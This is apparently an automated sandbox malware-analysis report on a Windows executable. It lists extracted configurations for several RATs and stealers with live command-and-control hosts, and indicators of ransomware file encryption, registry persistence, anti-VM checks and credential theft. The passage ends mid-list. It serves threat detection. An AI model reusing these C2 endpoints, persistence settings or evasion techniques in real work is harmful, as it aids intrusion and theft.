Resubmissions
17-12-2024 13:35
241217-qv6rzs1nhp 1015-11-2024 19:06
241115-xr6q5szdnf 1014-11-2024 23:35
241114-3lfknavfqg 1014-11-2024 23:26
241114-3eysnavfje 1014-11-2024 23:12
241114-26znlavdqq 10Analysis
-
max time kernel
475s -
max time network
624s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
17-12-2024 13:35
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win11-20241007-en
Errors
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
xworm
rondtimes.top:1940
crazyrdp.africa:7000
-
Install_directory
%Userprofile%
-
install_file
Windows.exe
Extracted
quasar
1.4.1
Office04
192.168.181.84:4782
testinghigger-42471.portmap.host:42471
1ed20179-691a-4881-806d-c5d12340d8e9
-
encryption_key
DF9BFB10D9C47294CB84A29DC07B28AE843D8C6F
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Extracted
stealc
Line
http://154.216.17.90
-
url_path
/a48146f6763ef3af.php
Extracted
stealc
LogsDiller
http://185.235.128.145
-
url_path
/b86b4c54b3438806.php
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
85.198.108.36:7667
egghlcckqridunl
-
delay
6
-
install
false
-
install_folder
%Temp%
Extracted
redline
eewx
185.81.68.147:1912
Extracted
amadey
4.41
1176f2
http://185.215.113.19
-
install_dir
417fd29867
-
install_file
ednfoki.exe
-
strings_key
183201dc3defc4394182b4bff63c4065
-
url_paths
/CoreOPT/index.php
Extracted
asyncrat
0.5.7B
Default
1.tcp.ap.ngrok.io:21049
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
true
-
install_file
chrome.exe
-
install_folder
%AppData%
Extracted
redline
LiveTraffic
95.179.250.45:26212
Extracted
stealc
Voov3
http://154.216.17.90
-
url_path
/a48146f6763ef3af.php
Extracted
redline
Logs
185.215.113.9:9137
Extracted
quasar
1.4.1
Test
193.161.193.99:35184
67.205.154.243:35184
9cabbafb-503b-49f1-ab22-adc756455c10
-
encryption_key
8B93C77AC1C58EA80A3327E9FD26246A79EF3B8E
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
MS Build Tools
-
subdirectory
Microsoft-Build-Tools
Signatures
-
Amadey family
-
Asyncrat family
-
Detect Vidar Stealer 1 IoCs
resource yara_rule behavioral1/memory/3976-291-0x0000000000400000-0x0000000002470000-memory.dmp family_vidar_v7 -
Detect Xworm Payload 4 IoCs
resource yara_rule behavioral1/files/0x0002000000025cbc-296.dat family_xworm behavioral1/memory/1724-302-0x0000000000D00000-0x0000000000D14000-memory.dmp family_xworm behavioral1/memory/9900-27252-0x0000000000400000-0x000000000041A000-memory.dmp family_xworm behavioral1/files/0x001900000002b085-29028.dat family_xworm -
Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
-
Dharma family
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\boot.exe,C:\\Program Files (x86)\\CSMClient\\CyberStation.exe," reg.exe -
Phorphiex family
-
Phorphiex payload 1 IoCs
resource yara_rule behavioral1/files/0x001a00000002ab46-46.dat family_phorphiex -
Quasar family
-
Quasar payload 7 IoCs
resource yara_rule behavioral1/files/0x0003000000025cb5-311.dat family_quasar behavioral1/memory/652-316-0x00000000000D0000-0x00000000003F4000-memory.dmp family_quasar behavioral1/files/0x0003000000000689-1074.dat family_quasar behavioral1/memory/3680-1079-0x0000000000B70000-0x0000000000E94000-memory.dmp family_quasar behavioral1/files/0x001900000002afd7-28521.dat family_quasar behavioral1/memory/11788-28526-0x0000000000DC0000-0x00000000010E4000-memory.dmp family_quasar behavioral1/files/0x001a00000002b068-28995.dat family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 5 IoCs
resource yara_rule behavioral1/files/0x001b00000002acc1-666.dat family_redline behavioral1/memory/1664-677-0x0000000000FE0000-0x0000000001032000-memory.dmp family_redline behavioral1/memory/2696-1096-0x0000000000400000-0x0000000000452000-memory.dmp family_redline behavioral1/files/0x001900000002afc0-28451.dat family_redline behavioral1/memory/11852-28456-0x00000000003E0000-0x0000000000432000-memory.dmp family_redline -
Redline family
-
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
description pid Process procid_target PID 4504 created 3312 4504 Waters.pif 53 PID 4504 created 3312 4504 Waters.pif 53 PID 4428 created 3312 4428 1694433196.exe 53 PID 4428 created 3312 4428 1694433196.exe 53 PID 564 created 3312 564 winupsecvmgr.exe 53 PID 564 created 3312 564 winupsecvmgr.exe 53 PID 564 created 3312 564 winupsecvmgr.exe 53 PID 4368 created 3312 4368 conhost.exe 53 PID 4368 created 3312 4368 conhost.exe 53 PID 3064 created 3312 3064 Plates.pif 53 PID 3064 created 3312 3064 Plates.pif 53 PID 14428 created 3312 14428 winupsecvmgr.exe 53 -
Vidar family
-
Xmrig family
-
Xworm family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x0004000000025704-938.dat family_asyncrat -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d4cye08a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Client_protected.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rorukal.exe -
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions rorukal.exe -
Looks for VirtualBox drivers on disk 2 TTPs 4 IoCs
description ioc Process File opened (read-only) C:\Windows\SysWOW64\drivers\VBoxMouse.sys svchost.exe File opened (read-only) C:\Windows\SysWOW64\drivers\VBoxGuest.sys svchost.exe File opened (read-only) C:\Windows\SysWOW64\drivers\VBoxSF.sys svchost.exe File opened (read-only) C:\Windows\SysWOW64\drivers\VBoxVideo.sys svchost.exe -
Renames multiple (593) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
XMRig Miner payload 4 IoCs
resource yara_rule behavioral1/memory/564-646-0x00007FF7C35C0000-0x00007FF7C3B57000-memory.dmp xmrig behavioral1/memory/648-709-0x00007FF76EA60000-0x00007FF76F24F000-memory.dmp xmrig behavioral1/memory/648-841-0x00007FF76EA60000-0x00007FF76F24F000-memory.dmp xmrig behavioral1/memory/648-865-0x00007FF76EA60000-0x00007FF76F24F000-memory.dmp xmrig -
Blocklisted process makes network request 8 IoCs
flow pid Process 53 3716 rundll32.exe 54 3716 rundll32.exe 63 4528 rundll32.exe 64 4528 rundll32.exe 81 3768 rundll32.exe 82 3768 rundll32.exe 88 4732 rundll32.exe 89 4732 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 10660 powershell.exe 11728 powershell.exe 9036 powershell.exe 9948 powershell.exe 9864 powershell.exe 4276 powershell.exe 4512 powershell.exe 9736 powershell.exe 12048 powershell.exe 7812 powershell.EXE 3520 powershell.exe 1072 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools rorukal.exe -
Looks for VMWare drivers on disk 2 TTPs 4 IoCs
description ioc Process File opened (read-only) C:\Windows\SysWOW64\drivers\vmmemctl.sys svchost.exe File opened (read-only) C:\Windows\SysWOW64\drivers\vmhgfs.sys svchost.exe File opened (read-only) C:\Windows\SysWOW64\drivers\vmmouse.sys svchost.exe File opened (read-only) C:\Windows\SysWOW64\drivers\vmci.sys svchost.exe -
Possible privilege escalation attempt 4 IoCs
pid Process 1296 icacls.exe 1748 takeown.exe 1988 icacls.exe 1664 icacls.exe -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/files/0x000400000000ef6d-1178.dat net_reactor behavioral1/memory/840-1183-0x0000000000C70000-0x0000000000CBE000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d4cye08a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d4cye08a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Client_protected.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Client_protected.exe -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Drops startup file 9 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk CoronaVirus.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CoronaVirus.exe CoronaVirus.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SkySync.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SkySync.url cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk uctgkfb7.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk uctgkfb7.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta CoronaVirus.exe -
Executes dropped EXE 64 IoCs
pid Process 1036 ExSync.exe 3392 ExSync.exe 332 m.exe 1352 sysnldcvmr.exe 1380 svchost.exe 3976 build_2024-07-25_20-56.exe 4536 svchost.exe 240 boot.exe 1080 wget.exe 1724 uctgkfb7.exe 652 Client-built.exe 4360 vtoroy.exe 3496 1613621604.exe 4564 wget.exe 5028 Client.exe 1500 ZinTask.exe 3268 d4cye08a.exe 1444 splwow64_1.exe 2960 31329958.exe 4504 Waters.pif 4484 wget.exe 2692 wget.exe 3484 Client_protected.exe 1416 run.exe 1680 ctx.exe 5056 npp.exe 836 run2.exe 2108 wget.exe 2824 Gxtuum.exe 4428 1694433196.exe 4748 985220867.exe 3184 wallx.exe 3760 wget.exe 1156 WallpaperX.exe 564 winupsecvmgr.exe 1996 wget.exe 2944 wget.exe 864 wget.exe 3964 zx.exe 3292 zx.exe 1664 ssg.exe 2372 FixCSM.exe 1692 Windows.exe 4496 Gxtuum.exe 1900 update.exe 1188 del.exe 916 D6BF.tmp.ssg.exe 784 E333.tmp.zx.exe 3484 E333.tmp.zx.exe 3468 Windows.exe 4728 Gxtuum.exe 652 [UPG]CSS.exe 2504 [UPG]CSS.new.exe 3600 [UPG]CSS.exe 3100 Krishna33.exe 3512 chrome.exe 1872 2020.exe 3500 2020.exe 2628 Windows.exe 2256 Gxtuum.exe 4648 client1.exe 4412 client1.exe 2012 jtkhikadjthsad.exe 3680 testingfile.exe -
Loads dropped DLL 64 IoCs
pid Process 3392 ExSync.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 3292 zx.exe 3292 zx.exe -
Modifies file permissions 1 TTPs 4 IoCs
pid Process 1664 icacls.exe 1296 icacls.exe 1748 takeown.exe 1988 icacls.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x0003000000025cd0-457.dat themida behavioral1/memory/3484-470-0x0000000000D90000-0x000000000141E000-memory.dmp themida behavioral1/memory/3484-471-0x0000000000D90000-0x000000000141E000-memory.dmp themida behavioral1/memory/3484-535-0x0000000000D90000-0x000000000141E000-memory.dmp themida -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CoronaVirus.exe = "C:\\Windows\\System32\\CoronaVirus.exe" CoronaVirus.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Windows\System32\Info.hta = "mshta.exe \"C:\\Windows\\System32\\Info.hta\"" CoronaVirus.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Users\Admin\AppData\Roaming\Info.hta = "mshta.exe \"C:\\Users\\Admin\\AppData\\Roaming\\Info.hta\"" CoronaVirus.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" m.exe Set value (str) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Users\\Admin\\Windows.exe" uctgkfb7.exe Set value (str) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\D6B5703258D647824525\\D6B5703258D647824525.exe" update.exe Set value (str) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\D6B5703258D647824525\\D6B5703258D647824525.exe" audiodg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\D6B5703258D647824525\\D6B5703258D647824525.exe" msiexec.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA d4cye08a.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Client_protected.exe -
Drops desktop.ini file(s) 64 IoCs
description ioc Process File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini CoronaVirus.exe File opened for modification C:\Program Files\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Downloads\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Pictures\desktop.ini CoronaVirus.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-2410826464-2353372766-2364966905-1000\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Documents\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Libraries\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Videos\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Videos\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Documents\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Searches\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Music\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Links\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini CoronaVirus.exe File opened for modification C:\$Recycle.Bin\S-1-5-21-2410826464-2353372766-2364966905-1000\desktop.ini CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI CoronaVirus.exe File opened for modification C:\Program Files (x86)\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Desktop\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini CoronaVirus.exe -
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 15 IoCs
flow ioc 141 raw.githubusercontent.com 33 discord.com 330 1.tcp.ap.ngrok.io 467 raw.githubusercontent.com 3 raw.githubusercontent.com 31 discord.com 146 1.tcp.ap.ngrok.io 264 1.tcp.ap.ngrok.io 382 1.tcp.ap.ngrok.io 29 discord.com 13 raw.githubusercontent.com 30 discord.com 201 1.tcp.ap.ngrok.io 491 1.tcp.ap.ngrok.io 1 discord.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 146 ipinfo.io 147 ipinfo.io 330 ip-api.com -
Power Settings 1 TTPs 4 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 7692 powercfg.exe 15108 powercfg.exe 14984 powercfg.exe 14816 powercfg.exe -
Drops file in System32 directory 6 IoCs
description ioc Process File created C:\Windows\System32\Info.hta CoronaVirus.exe File created C:\Windows\System32\del.exe wget.exe File opened for modification C:\Windows\System32\del.exe wget.exe File created C:\windows\system32\boot.exe cmd.exe File opened for modification C:\windows\system32\boot.exe cmd.exe File created C:\Windows\System32\CoronaVirus.exe CoronaVirus.exe -
Enumerates processes with tasklist 1 TTPs 36 IoCs
pid Process 4264 tasklist.exe 9424 tasklist.exe 3792 tasklist.exe 4832 tasklist.exe 4480 tasklist.exe 13612 tasklist.exe 15808 tasklist.exe 476 tasklist.exe 1876 tasklist.exe 1932 tasklist.exe 13788 tasklist.exe 4052 tasklist.exe 15028 tasklist.exe 4864 tasklist.exe 1776 tasklist.exe 1260 tasklist.exe 256 tasklist.exe 2116 tasklist.exe 3724 tasklist.exe 1192 tasklist.exe 4476 tasklist.exe 1336 tasklist.exe 2644 tasklist.exe 3716 tasklist.exe 4432 tasklist.exe 4680 tasklist.exe 4220 tasklist.exe 8700 tasklist.exe 5392 tasklist.exe 1216 tasklist.exe 5040 tasklist.exe 1176 tasklist.exe 12708 tasklist.exe 1472 tasklist.exe 2080 tasklist.exe 5044 tasklist.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\images\\hinhnen.jpg" WallpaperX.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3268 d4cye08a.exe 3484 Client_protected.exe -
Suspicious use of SetThreadContext 7 IoCs
description pid Process procid_target PID 564 set thread context of 4368 564 winupsecvmgr.exe 266 PID 564 set thread context of 648 564 winupsecvmgr.exe 267 PID 1900 set thread context of 4696 1900 update.exe 288 PID 1900 set thread context of 2664 1900 update.exe 289 PID 1900 set thread context of 1048 1900 update.exe 290 PID 3832 set thread context of 2696 3832 GOLD.exe 332 PID 6212 set thread context of 9900 6212 xyaw4fkp.exe 411 -
resource yara_rule behavioral1/files/0x0005000000024fad-18081.dat upx behavioral1/memory/12344-19535-0x00007FF7211A0000-0x00007FF7216DE000-memory.dmp upx behavioral1/memory/12344-26315-0x00007FF7211A0000-0x00007FF7216DE000-memory.dmp upx behavioral1/files/0x001b00000002b089-29083.dat upx -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN rorukal.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Runtime.Handles.dll.id-1686D269.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.32731.0_x64__8wekyb3d8bbwe\Assets\SplashScreen.scale-100.png CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Access2019VL_MAK_AE-ppd.xrm-ms CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\fr\WindowsFormsIntegration.resources.dll CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.41182.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SmallTile.scale-400_contrast-black.png CoronaVirus.exe File created C:\Program Files\Java\jre-1.8\bin\api-ms-win-core-string-l1-1-0.dll.id-1686D269.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ja-jp\ui-strings.js CoronaVirus.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ui-strings.js.id-1686D269.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_12104.1001.1.0_neutral_split.scale-100_8wekyb3d8bbwe\resources.pri CoronaVirus.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ja\UIAutomationProvider.resources.dll.id-1686D269.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\lib\FluentTheme.js CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\lib-commonjs\fonts\createFontStyles.js CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_share_18.svg.id-1686D269.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-cn\ui-strings.js.id-1686D269.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\kinit.exe CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft 